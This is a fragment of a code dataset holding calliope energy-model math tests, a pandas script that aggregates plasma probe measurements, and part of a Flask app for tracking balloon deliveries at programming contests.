all math has been tested\"\n for key in self.TEST_REGISTER:\n base_math.del_key(key)\n assert not base_math\n\n\nclass CustomMathExamples(ABC):\n TEST_REGISTER: set = set()\n\n #: source of all custom math files\n CUSTOM_MATH_DIR = CALLIOPE_DIR.parent.parent / \"doc\" / \"_static\" / \"custom_math\"\n\n @property\n @abstractmethod\n def YAML_FILEPATH(self) -> str:\n \"Source of the specific test class custom math\"\n\n @pytest.fixture(scope=\"class\")\n def abs_filepath(self):\n return (self.CUSTOM_MATH_DIR / self.YAML_FILEPATH).absolute()\n\n @pytest.fixture(scope=\"class\")\n def custom_math(self):\n return AttrDict.from_yaml(self.CUSTOM_MATH_DIR / self.YAML_FILEPATH)\n\n @pytest.fixture\n def build_and_compare(self, abs_filepath, compare_lps):\n def _build_and_compare(\n filename: str,\n scenario: str,\n overrides: Optional[dict] = None,\n components: Optional[dict[list[str]]] = None,\n ):\n if components is not None:\n for component_group, component_list in components.items():\n for component in component_list:\n self.TEST_REGISTER.add(f\"{component_group}.{component}\")\n\n custom_math = {k: v for k, v in components.items() if k != \"variables\"}\n else:\n self.TEST_REGISTER.add(f\"constraints.{filename}\")\n custom_math = {\"constraints\": [filename]}\n\n if overrides is None:\n overrides = {}\n\n model = build_test_model(\n {\"config.init.custom_math\": [abs_filepath], **overrides},\n scenario,\n )\n\n compare_lps(model, custom_math, filename)\n\n return _build_and_compare\n\n @pytest.mark.order(-1)\n def test_all_math_registered(self, custom_math):\n \"After running all the previous tests in the class, the register should be full, i.e. all math has been tested\"\n for key in self.TEST_REGISTER:\n if custom_math.get_key(key, default=None) is not None:\n custom_math.del_key(key)\n assert not custom_math\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `annual_flow_max`:calliope.exceptions.ModelWarning\"\n)\nclass TestAnnualEnergyBalance(CustomMathExamples):\n YAML_FILEPATH = \"annual_energy_balance.yaml\"\n\n def test_annual_energy_balance_per_tech_and_node(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.annual_flow_max\": 10,\n \"nodes.b.techs.test_supply_elec.constraints.annual_flow_max\": 20,\n }\n build_and_compare(\n \"annual_energy_balance_per_tech_and_node\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_global_per_tech(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_flow_max\": {\n \"data\": 10,\n \"index\": [\"test_supply_elec\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_global_per_tech\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_global_multi_tech(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_flow_max\": {\"data\": 10},\n \"flow_max_group\": {\n \"data\": True,\n \"index\": [\"test_supply_elec\", \"test_supply_plus\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_global_multi_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_total_source_availability(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_source_max\": {\n \"data\": 10,\n \"index\": [\"test_supply_plus\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_total_source_availability\",\n 
\"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_total_sink_availability(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_sink_max\": {\n \"data\": 10,\n \"index\": [\"test_demand_elec\"],\n \"dims\": \"techs\",\n },\n },\n }\n build_and_compare(\n \"annual_energy_balance_total_sink_availability\",\n \"simple_supply,two_hours,demand_elec_max\",\n overrides,\n )\n\n\nclass TestMaxTimeVarying(CustomMathExamples):\n YAML_FILEPATH = \"max_time_varying.yaml\"\n\n def test_max_time_varying_flow_cap(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"flow_cap_max_relative_per_ts\": {\n \"data\": [0.8, 0.5],\n \"index\": [\n [\"test_supply_elec\", \"2005-01-01 00:00\"],\n [\"test_supply_elec\", \"2005-01-01 01:00\"],\n ],\n \"dims\": [\"techs\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"max_time_varying_flow_cap\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_max_time_varying_storage(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"storage_max_relative_per_ts\": {\n \"data\": [0.8, 0.5],\n \"index\": [\n [\"test_storage\", \"2005-01-01 00:00\"],\n [\"test_storage\", \"2005-01-01 01:00\"],\n ],\n \"dims\": [\"techs\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"max_time_varying_storage\",\n \"simple_storage,two_hours\",\n overrides,\n )\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `turbine_type`:calliope.exceptions.ModelWarning\"\n)\nclass TestCHPHTP(CustomMathExamples):\n YAML_FILEPATH = \"chp_htp.yaml\"\n\n def test_chp_extraction(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_loss_factor\": 0.1,\n \"techs.test_chp.constraints.power_to_heat_ratio\": 2,\n \"techs.test_chp.constraints.energy_eff\": 0.6,\n \"techs.test_chp.constraints.turbine_type\": \"extraction\",\n }\n build_and_compare(\n \"chp_extraction\",\n \"simple_chp,two_hours\",\n overrides,\n components={\n \"constraints\": [\"chp_extraction_line\", \"chp_backpressure_line_min\"]\n },\n )\n\n def test_chp_backpressure_and_boiler(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_to_heat_ratio\": 1.5,\n \"techs.test_chp.constraints.boiler_eff\": 0.8,\n \"techs.test_chp.constraints.energy_eff\": 0.6,\n \"techs.test_chp.constraints.turbine_type\": \"backpressure\",\n }\n build_and_compare(\n \"chp_backpressure_and_boiler\",\n \"simple_chp,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"chp_divert_fuel_to_boiler\",\n \"chp_backpressure_line_max\",\n ]\n },\n )\n\n def test_chp_backpressure_no_boiler(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_to_heat_ratio\": 1.25,\n \"techs.test_chp.constraints.turbine_type\": \"backpressure\",\n }\n build_and_compare(\n \"chp_backpressure_line_equals\",\n \"simple_chp,two_hours\",\n overrides,\n )\n\n\nclass TestShareAllTimesteps(CustomMathExamples):\n YAML_FILEPATH = \"share_all_timesteps.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `demand_share_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_demand_share_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.demand_share_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.demand_share_equals\": 0.8,\n \"parameters\": {\"demand_share_tech.data\": \"test_demand_elec\"},\n }\n build_and_compare(\n \"demand_share_equals_per_tech\",\n 
\"simple_supply,two_hours\",\n overrides,\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `supply_share_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_supply_share_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.supply_share_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.supply_share_equals\": 0.8,\n \"parameters\": {\"supply_share_carrier.data\": \"electricity\"},\n }\n build_and_compare(\n \"supply_share_equals_per_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n\nclass TestSharePerTimestep(CustomMathExamples):\n YAML_FILEPATH = \"share_per_timestep.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `demand_share_per_timestep_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_demand_share_per_timestep_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.demand_share_per_timestep_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.demand_share_per_timestep_equals\": 0.8,\n \"parameters\": {\"demand_share_tech.data\": \"test_demand_elec\"},\n }\n build_and_compare(\n \"demand_share_per_timestep_equals_per_tech\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `supply_share_per_timestep_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_supply_share_per_timestep_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.supply_share_per_timestep_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.supply_share_per_timestep_equals\": 0.8,\n \"parameters\": {\"supply_share_carrier.data\": \"electricity\"},\n }\n build_and_compare(\n \"supply_share_per_timestep_equals_per_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n\nclass TestDemandSharePerTimestepDecision(CustomMathExamples):\n YAML_FILEPATH = \"demand_share_per_timestep_decision.yaml\"\n\n def test_demand_share_per_timestep_decision_main(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"decide_demand_share\": {\n \"data\": \"test_demand_elec\",\n \"index\": [\"test_supply_elec\", \"test_conversion_plus\"],\n \"dims\": \"techs\",\n },\n \"demand_share_carrier.data\": \"electricity\",\n \"demand_share_relaxation.data\": 0.01,\n }\n }\n build_and_compare(\n \"demand_share_per_timestep_decision_main\",\n \"conversion_and_conversion_plus,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"demand_share_per_timestep_decision_main_min\",\n \"demand_share_per_timestep_decision_main_max\",\n ],\n \"variables\": [\"demand_share_per_timestep_decision\"],\n },\n )\n\n def test_demand_share_per_timestep_decision_sum(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"decide_demand_share\": {\n \"data\": \"test_demand_elec\",\n \"index\": [\"test_supply_elec\", \"test_conversion_plus\"],\n \"dims\": \"techs\",\n },\n \"demand_share_carrier.data\": \"electricity\",\n \"demand_share_limit.data\": 0.5,\n },\n }\n build_and_compare(\n \"demand_share_per_timestep_decision_sum\",\n \"conversion_and_conversion_plus,two_hours\",\n overrides,\n )\n\n\nclass TestPiecewiseCosts(CustomMathExamples):\n YAML_FILEPATH = \"piecewise_linear_costs.yaml\"\n\n def test_piecewise(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.lifetime\": 10,\n 
\"techs.test_supply_elec.costs.monetary.interest_rate\": 0.1,\n \"parameters\": {\n \"cost_flow_cap_piecewise_slopes\": {\n \"data\": [5, 7, 14],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n \"cost_flow_cap_piecewise_intercept\": {\n \"data\": [0, -2, -16],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n },\n }\n build_and_compare(\n \"piecewise_cost_investment\",\n \"supply_purchase,two_hours\",\n overrides,\n components={\n \"constraints\": [\"piecewise_costs\"],\n \"variables\": [\"piecewise_cost_investment\"],\n \"global_expressions\": [\"cost_investment\", \"cost_var\", \"cost\"],\n },\n )\n\n\nclass TestPiecewiseEfficiency(CustomMathExamples):\n YAML_FILEPATH = \"piecewise_linear_efficiency.yaml\"\n\n def test_piecewise(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"flow_eff_piecewise_slopes\": {\n \"data\": [5, 7, 14],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n \"flow_eff_piecewise_intercept\": {\n \"data\": [0, -2, -16],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n },\n }\n build_and_compare(\n \"piecewise_efficiency\",\n \"conversion_milp,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"piecewise_efficiency\",\n \"available_flow_cap_binary\",\n \"available_flow_cap_continuous\",\n \"available_flow_cap_binary_continuous_switch\",\n ],\n \"variables\": [\"available_flow_cap\"],\n },\n )\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*`test_conversion_plus` gives a carrier ratio for `heat`:calliope.exceptions.ModelWarning\"\n)\nclass TestFuelDist(CustomMathExamples):\n YAML_FILEPATH = \"fuel_dist.yaml\"\n\n def test_fuel_distribution(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n },\n }\n build_and_compare(\n \"fuel_dist_base\",\n \"fuel_distribution,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"system_balance\",\n \"restrict_total_imports_and_exports\",\n ],\n \"variables\": [\"fuel_distributor\"],\n },\n )\n\n def test_fuel_distribution_nodal_limits(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n \"fuel_import_max\": {\n \"data\": 5,\n \"index\": [[\"coal\", \"b\"]],\n \"dims\": [\"carriers\", \"nodes\"],\n },\n \"fuel_export_max\": {\n \"data\": 3,\n \"index\": [[\"coal\", \"a\"]],\n \"dims\": [\"carriers\", \"nodes\"],\n },\n },\n }\n build_and_compare(\n \"fuel_dist_nodal\",\n \"fuel_distribution,two_hours\",\n overrides,\n components={\n \"constraints\": [\"restrict_nodal_imports\", \"restrict_nodal_exports\"],\n },\n )\n\n def test_fuel_distribution_costs(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n \"fuel_distributor_costs\": {\n \"data\": 5,\n \"index\": [[\"coal\", \"monetary\"]],\n \"dims\": [\"carriers\", \"costs\"],\n },\n },\n }\n build_and_compare(\n \"fuel_dist_cost\",\n \"fuel_distribution,two_hours,investment_costs\",\n overrides,\n components={\n \"global_expressions\": [\n \"cost_investment\", # Need to build these up so that `cost` is available in the objective\n \"cost_var\", # Need to build these up so that `cost` is available in the objective\n \"cost\", # Need to build these up so that `cost` is available in the objective\n \"cost_fuel_distribution\",\n ],\n \"objectives\": 
[\"min_cost_optimisation\"],\n },\n )\n\n\nclass TestUptimeDowntime(CustomMathExamples):\n YAML_FILEPATH = \"uptime_downtime_limits.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `capacity_factor:calliope.exceptions.ModelWarning\"\n )\n def test_annual_capacity_factor(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.capacity_factor_min\": 0.8,\n \"techs.test_supply_elec.constraints.capacity_factor_max\": 0.9,\n }\n build_and_compare(\n \"annual_capacity_factor\",\n \"simple_supply,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"annual_capacity_factor_min\",\n \"annual_capacity_factor_max\",\n ]\n },\n )\n\n def test_downtime(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"downtime_periods\": {\n \"data\": True,\n \"index\": [[\"test_supply_elec\", \"a\", \"2005-01-01 00:00\"]],\n \"dims\": [\"techs\", \"nodes\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"downtime_period\",\n \"simple_supply,two_hours\",\n overrides,\n components={\"constraints\": [\"downtime_period\"]},\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `uptime_limit`:calliope.exceptions.ModelWarning\"\n )\n def test_downtime_decision(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.uptime_limit\": 1,\n }\n build_and_compare(\n \"downtime_period_decision\", \"supply_milp,two_hours\", overrides\n )\n\n\nclass TestNetImportShare(CustomMathExamples):\n YAML_FILEPATH = \"net_import_share.yaml\"\n shared_overrides = {\n \"parameters.net_import_share\": 1.5,\n \"nodes.c.techs\": {\n \"test_demand_heat\": {\"constraints.sink_equals\": \"file=demand_heat.csv:a\"}\n },\n \"links.a,c.techs\": {\n \"test_transmission_heat\": None,\n \"test_transmission_elec\": None,\n },\n }\n\n def test_net_import_share_max(self, build_and_compare):\n build_and_compare(\n \"net_import_share_max\", \"simple_supply,two_hours\", self.shared_overrides\n )\n\n def test_net_annual_import_share_max(self, build_and_compare):\n build_and_compare(\n \"net_annual_import_share_max\",\n \"simple_supply,two_hours\",\n self.shared_overrides,\n )\n\n def test_net_annual_import_share_max_node_group(self, build_and_compare):\n build_and_compare(\n \"net_annual_import_share_max_node_group\",\n \"simple_supply,two_hours\",\n self.shared_overrides,\n )\n","repo_name":"calliope-project/calliope","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":25608,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"94"} +{"seq_id":"3730012940","text":"import os\nimport json\nimport sys\n# import pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\n\nA = 12 * 10**-6\n\ndef aggregate_data(path):\n '''\n This function reads all data from a directory\n and puts it in a dataframe.\n '''\n # list for all data\n items = [x for x in os.listdir(path)]\n print(\"Reading dataset:\" + str(items))\n data = []\n # reading all json files\n for item in items:\n data += json.load(open(path + \"/\" + item + \"/fit_results.json\", 'r'))\n # creating dataframe\n df = DataFrame(data, columns=['id', 'probe', 'x', 'I_B', 'P', 'W_em', 'P_off',\n 'T_e', 'err_T_e', 'n_e', 'err_n_e', 'f_ep', 'err_f_ep',\n 'v_plasma', 'err_v_plasma', 'alpha', 'err_alpha',\n 'v_floating', 'err_v_floating',\n 'i_ionic_sat', 'err_i_ionic_sat'])\n # post_processing on the whole data\n post_processing(df)\n return df\n\n\ndef post_processing(df):\n 
df['j_sat'] = df['i_ionic_sat'] / A\n\n\ndef remove_bias_ne(df):\n '''This function removes the bias getting\n the scale in the middle point of the selected columns'''\n j1 = df[(df.x == 0) & (df.probe == 1)]['j_sat'].values[0]\n j2 = df[(df.x == 0) & (df.probe == 2)]['j_sat'].values[0]\n medio = (j2 + j1) / 2\n delta1 = (medio - j1) / j1\n delta2 = (medio - j2) / j2\n df.ix[df.probe == 1, 'n_e'] *= (1 + delta1)\n df.ix[df.probe == 2, 'n_e'] *= (1 + delta2)\n\n\ndef remove_bias(df, columns):\n '''This function removes the bias in the central\n point for the column specified'''\n deltas = []\n for column in columns:\n s1 = df[(df.probe == 1) & (df.x == 0)][column].values[0]\n s2 = df[(df.probe == 2) & (df.x == 0)][column].values[0]\n delta = (s2 - s1) / 2\n df.ix[df.probe == 1, column] += delta\n df.ix[df.probe == 2, column] -= delta\n deltas.append((round(((delta * 2) / s1) * 100, 4),\n round(((delta * 2) / s2) * 100, 4)))\n return deltas\n\ndef get_fuh(df, B):\n '''This funcion adds to the dataframe the f_upperhybrid'''\n f_ce = np.multiply(2.80e6, B)\n df[\"B\"] = B\n df[\"f_uh\"] = (df.f_ep**2 + f_ce**2)**0.5\n df[\"err_f_uh\"] = (df.f_ep / ((df.f_ep**2 + df.B**2)**(3 / 2))) * df.err_f_ep\n\n\nif __name__ == \"__main__\":\n # reading from the conf file\n path = sys.argv[1]\n df = aggregate_data(path)\n","repo_name":"grigolet/lab16gym","sub_path":"langmuir/gymness/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16508333385","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, abort, render_template, request, make_response, redirect, url_for\nimport json, sys, urllib\nimport logging\n\nfrom miscellaneous import *\nimport auth\nimport lang\nimport design\nimport config\nfrom balloon import Balloon\nfrom db import DB\n\nball = Flask(__name__)\nactions = {}\n\n\ndef page(*, title, content):\n return render_template(\n 'template.html',\n title=title,\n base=config.base_url,\n content=content\n )\n\n\n# actions: methods that modify something\n\n@arguments(None, id=int)\ndef action_access_grant(db, *, id):\n db.volunteer_access(id, True)\n return redirect(url_for('volunteers'))\n\n@arguments(None, id=int)\ndef action_access_refuse(db, *, id):\n db.volunteer_access(id, False)\n return redirect(url_for('volunteers'))\n\n@arguments(None, url=str)\ndef action_event_add(db, *, url):\n db.event_add(1, url)\n return redirect(url_for('index'))\n\n@arguments(None, problem=int, value=str)\ndef action_color_set(db, *, problem, value):\n db.problem_color(problem, value)\n return redirect(url_for(\"problem\", problem=problem))\n\n@arguments(None, event=int, balloon=int, volunteer=str)\ndef action_balloon_done(db, *, event, balloon, volunteer):\n db.balloon_done(balloon, volunteer)\n return redirect(url_for(\"event\", event=event))\n\n@arguments(None, event=int, balloon=int)\ndef action_balloon_drop(db, *, event, balloon):\n db.balloon_drop(balloon)\n return redirect(url_for(\"event\", event=event))\n\n@arguments(None, event=int, balloon=int, volunteer=str)\ndef action_balloon_take(db, *, event, balloon, volunteer):\n balloon = db.balloon(balloon, lock=True)\n if balloon is None:\n return abort(404)\n state = int (balloon[4])\n if state >= 100:\n return page(\n title=lang.lang['error'],\n content=design.error(\n message=lang.lang['error_ball_taken'],\n back=url_for(\"event\", event=event)\n )\n )\n db.balloon_take(balloon[0], volunteer)\n return 
redirect(url_for(\"event\", event=event))\n\n\n@ball.route('/action_mk2', methods=['POST'])\ndef do_action_mk2():\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'), code=307)\n token = request.form['token']\n token_cookie = request.cookies.get('ball_token')\n if token != token_cookie or len(token) < 10:\n print (\"token mismatch: %s vs %s\" % (repr (token), repr (token_cookie)), file=sys.stderr)\n return abort(403);\n try:\n callback = {\n 'access_grant': action_access_grant,\n 'access_refuse': action_access_refuse,\n 'event_add': action_event_add,\n 'color_set': action_color_set,\n 'balloon_take': action_balloon_take,\n 'balloon_drop': action_balloon_drop,\n 'balloon_done': action_balloon_done,\n }[request.form['method']]\n except KeyError:\n print (\"unknown action method: '%s'\" % request.form['method'])\n return abort(404)\n db = DB()\n result = callback(db, **{\n k: v for k, v in request.form.items()\n if k not in ['method', 'token']\n })\n db.close(commit=True)\n return result\n\n\nvolunteer_cache = {}\ndef volunteer_get(volunteer_id):\n if volunteer_id in volunteer_cache:\n return volunteer_cache[volunteer_id]\n if volunteer_id.startswith('vk:'):\n vk_id = int (volunteer_id[3:])\n api_url = \"https://api.vk.com/method/users.get?\" + \\\n urllib.parse.urlencode({'user_ids': vk_id})\n try:\n res = json.loads(urllib.request.urlopen(api_url).read().decode())\n except urllib.error.HTTPError:\n return None\n if 'error' in res:\n return None\n res = res['response'][0]\n volunteer_cache[volunteer_id] = (\n \"%s %s\" % (res['first_name'], res['last_name']),\n \"https://vk.com/id%s\" % res['uid']\n )\n return volunteer_cache[volunteer_id]\n if volunteer_id.startswith('google:'):\n google_id = int (volunteer_id[7:])\n api_url = \"https://www.googleapis.com/plus/v1/people/%d?key=%s\" % (\n google_id, config.google_key\n )\n try:\n res = json.loads(urllib.request.urlopen(api_url).read().decode())\n except urllib.error.HTTPError:\n return None\n if 'error' in res:\n return None\n volunteer_cache[volunteer_id] = (res['displayName'], res['url'])\n return volunteer_cache[volunteer_id]\n return None\n\n\n@ball.route('/')\ndef index():\n user_id, auth_html, user_ok = check_auth(request)\n content = ''\n db = DB()\n events = db.events()\n db.close()\n if len(events) == 0:\n content = lang.lang['index_no_events']\n if user_ok:\n event_link = design.event_link\n else:\n event_link = design.event_nolink\n for e in events:\n if e[1]:\n content += event_link(url=url_for('event', event=e[0]), name=e[1])\n else:\n content += design.event_nolink(name=e[3])\n if user_ok:\n content += design.action_form_event(arguments={\n 'method': 'event_add',\n })\n content += design.link(url=url_for('volunteers'), label=lang.lang['access_manage'])\n response = make_response(render_template(\n 'template.html',\n title=lang.lang['index_title'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n if user_ok:\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/volunteers')\ndef volunteers():\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n volunteers = []\n for id in config.allowed_users:\n volunteer = volunteer_get(id)\n if volunteer is None:\n volunteer_str = design.volunteer(id=str(id))\n else:\n volunteer_name, volunteer_link = volunteer\n volunteer_str = ' ' + design.volunteer_ext(\n name=volunteer_name,\n 
url=volunteer_link\n )\n if id == user_id:\n change = design.text(text=lang.lang['this_is_you'])\n else:\n change = design.text(text=lang.lang['volunteer_from_config'])\n volunteers.append(design.volunteer_access(\n name=volunteer_str,\n change=change\n ))\n db = DB()\n for db_id, id, access in db.volunteers():\n volunteer = volunteer_get(id)\n if volunteer is None:\n volunteer_str = design.volunteer(id=str(id))\n else:\n volunteer_name, volunteer_link = volunteer\n volunteer_str = ' ' + design.volunteer_ext(\n name=volunteer_name,\n url=volunteer_link\n )\n if id == user_id:\n change = design.text(text=lang.lang['this_is_you'])\n elif access:\n change = design.action_link_mk2(\n arguments={\n 'method': 'access_refuse',\n 'id': db_id\n },\n label=lang.lang['access_refuse']\n )\n else:\n change = design.action_link_mk2(\n arguments={\n 'method': 'access_grant',\n 'id': db_id\n },\n label=lang.lang['access_grant']\n )\n volunteers.append((\n design.volunteer_access if access else design.volunteer_noaccess\n )(\n name=volunteer_str,\n change=change\n ))\n db.close()\n volunteers = ''.join(volunteers)\n content = design.volunteers(volunteers=volunteers)\n response = make_response (render_template(\n 'template.html',\n title=lang.lang['volunteers_title'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/problem/<problem>')\ndef problem(problem):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n problem_id = int(problem)\n content = ''\n db = DB()\n problems = [db.problem(problem_id)]\n db.close()\n problems_html = design.problem_header(letter=problems[0]['letter'], name=problems[0]['name'])\n content += problems_html\n colors_html = ''\n colors_html += design.problem_color(color=problems[0]['color'])\n colors_html += design.action_form_color(\n arguments={\n 'method': 'color_set',\n 'problem': problem_id\n },\n default=problems[0]['color']\n )\n content += colors_html\n response = make_response (render_template(\n 'template.html',\n title=problems[0]['letter'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\ndef get_state_str_current(event_id, b, *, user_id):\n state_str = design.action_link_mk2(\n arguments={\n 'method': 'balloon_done',\n 'event': event_id,\n 'balloon': b.id,\n 'volunteer': user_id\n },\n label=lang.lang['event_queue_done']\n ) + ' ' + design.action_link_mk2(\n arguments={\n 'method': 'balloon_drop',\n 'event': event_id,\n 'balloon': b.id\n },\n label=lang.lang['event_queue_drop']\n )\n return state_str\n\n\ndef get_state_str_queue(event_id, b, *, user_id):\n state_str = None\n if b.state >= 0 and b.state < 100:\n state_str = (\n design.text(text=lang.lang['balloon_state_wanted']) + ' ' +\n design.action_link_mk2(\n arguments={\n 'method': 'balloon_take',\n 'event': event_id,\n 'balloon': b.id,\n 'volunteer': user_id\n },\n label=lang.lang['event_queue_take']\n )\n )\n elif b.state < 200:\n state_str = design.text(text=lang.lang['balloon_state_carrying'])\n elif b.state < 300:\n state_str = design.text(text=lang.lang['balloon_state_delivered'])\n else:\n state_str = design.text(lang.lang['balloon_state_error'])\n if str(b.volunteer_id) != '':\n volunteer = volunteer_get (str(b.volunteer_id))\n if volunteer is None:\n state_str += ' ' + 
design.volunteer(id=str(b.volunteer_id))\n else:\n volunteer_name, volunteer_link = volunteer\n state_str += ' ' + design.volunteer_ext(\n name=volunteer_name,\n url=volunteer_link\n )\n return state_str\n\n\n@ball.route('/event/<event>')\ndef event(event):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n event_id = int(event)\n content = ''\n db = DB()\n try:\n e = db.event(event_id)\n except KeyError:\n e = None\n if e is None:\n return redirect(url_for('index'))\n event = {\n 'name': e[1],\n 'state': e[2],\n 'url': e[3]}\n event_html = ''\n event_html += design.standings_link(url=url_for('event_standings', event=event_id))\n content += event_html\n\n problems = db.problems(event_id)\n problems_map = {p['id']: i for i, p in enumerate (problems)}\n for p in problems:\n cnt = db.balloons_count(event_id, p['id'])\n p['cnt'] = cnt\n problems_html = design.problems(\n problems=''.join ([\n design.problem(\n color_token=' ' if p['color'] else '?',\n color=p['color'],\n url=url_for('problem', problem=p['id']),\n letter=p['letter'],\n count=str(p['cnt'])\n )\n for p in problems\n ])\n )\n content += problems_html\n\n teams = db.teams(event_id)\n teams_map = {t['id']: i for i, t in enumerate (teams)}\n\n first_to_solve = {}\n for p in problems:\n try:\n first_to_solve[p['id']] = db.fts(event_id, problem_id=p['id'])\n except KeyError:\n pass\n\n first_solved = {}\n for t in teams:\n try:\n first_solved[t['id']] = db.fts(event_id, team_id=t['id'])\n except KeyError:\n pass\n\n def get_balloons_html(header, get_state_str, balloons):\n nonlocal user_id\n if len(balloons) == 0:\n return ''\n balloons_html = []\n for b in balloons:\n p = problems[problems_map[b.problem_id]]\n t = teams[teams_map[b.team_id]]\n state_str = get_state_str(event_id, b, user_id=user_id)\n balloons_text = ' '\n if not p['color']:\n balloons_text = '?'\n if first_to_solve[b.problem_id] == b.id:\n x = design.fts(text=lang.lang['event_queue_problem'])\n else:\n x = design.fts_no(text=lang.lang['event_queue_problem'])\n # FTS for team is confusing, disable it for now\n #if b.team_id in first_solved and first_solved[b.team_id] == b.id:\n # y = design.fts(text=lang.lang['event_queue_team'])\n #else:\n y = design.fts_no(text=lang.lang['event_queue_team'])\n balloons_html.append(design.balloon(\n color_token=balloons_text,\n color=p['color'],\n problem_comment=x,\n letter=p['letter'],\n team_comment=y,\n team_short=t['name'],\n team=t['long_name'],\n state=state_str\n ))\n balloons_html = design.table(\n header=header + \" (%d)\" % len (balloons),\n content=''.join (balloons_html)\n )\n return balloons_html\n\n balloons = db.balloons_my(event_id, user_id)\n balloons = list (map (Balloon, balloons))\n content += get_balloons_html(\n 